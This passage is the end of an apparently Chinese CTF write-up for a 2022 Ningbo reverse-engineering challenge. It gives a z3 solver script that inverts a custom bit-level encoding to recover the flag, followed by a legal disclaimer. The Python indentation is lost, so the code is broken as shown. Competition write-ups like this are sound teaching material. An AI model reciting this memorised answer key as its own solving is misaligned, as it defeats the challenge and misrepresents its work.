enc = [0] * 8
for k in range(8):
for m in range(8):
enc[k] |= ((ROL(revs[m], 5, 8) >> (7 - k) & 1) * 0x80) >> m
# if ROL(revs[m], 5, 8) >> (7 - k) & 1:
# enc[k] |= 0x80 >> m
print([bin(ROL(i, 5, 8))[2:].zfill(8) for i in revs])
print([bin(i)[2:].zfill(8) for i in enc])
# ['10001001', '01010110', '11000000', '11011111', '10001001', '00010101', '11011011', '00001100']
# ['10111010', '01110010', '00000000', '01010110', '10011011', '01010101', '01010010', '10011110']
完整脚本如下
from z3 import *
def ROL(data, shift, size=32):
shift %= size
remains = data >> (size - shift)
body = (data << shift) - (remains << size )
return body + remains
def ROR(data, shift, size=32):
shift %= size
body = data >> shift
remains = (data << (size - shift)) - (body << size)
return body + remains
def solves(res):
sol = Solver()
raw = [BitVec(f"flag[{i}]", 8) for i in range(8)]
inp = raw.copy()
for i in range(0, 4, 3):
v20 = inp[i] ^ inp[i + 2]
inp[i] = v20
v19 = v20 ^ inp[i + 2] ^ inp[i + 1]
inp[i + 1] = v19
inp[i + 2] ^= v19
v14 = Concat(*inp)
for i in range(64):
v14 = (v14 * 2) ^ (((v14 >> 63) & 1) * 0x2EF20D07161E85F7)
inp3 = [
Extract(7, 0, v14),
Extract(15, 8, v14),
Extract(23, 16, v14),
Extract(31, 24, v14),
Extract(39, 32, v14),
Extract(47, 40, v14),
Extract(55, 48, v14),
Extract(63, 56, v14),
]
temp = [0] * 8
for i in range(8):
ch = 0
for j in range(8):
ch <<= 1
ch += res[j] >> (7 - i) & 1
ch = ROR(ch, 5, 8)
temp[i] = ch
for i in range(8):
sol.add(inp3[i] == temp[i])
assert sol.check() == sat
mol = sol.model()
print(bytearray([mol.eval(i).as_long() for i in raw]))
cmpdata = [0xC8, 0x34, 0x59, 0x4E, 0xC0, 0xD5, 0xAD, 0x08, 0xC9, 0x2B, 0x4C, 0xDA, 0xE6, 0xC0, 0x9A, 0x19, 0xB5, 0x10, 0x55, 0x7D, 0xE8, 0xF5, 0x83, 0xFF, 0x74, 0x8B, 0xE3, 0xD4, 0x6A, 0x7D, 0x44, 0x58]
for i in range(0, len(cmpdata), 8):
solves(cmpdata[i:i+8])
原文始发于微信公众号(7coinSec):【7coin】2022宁波市赛WriteUp
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论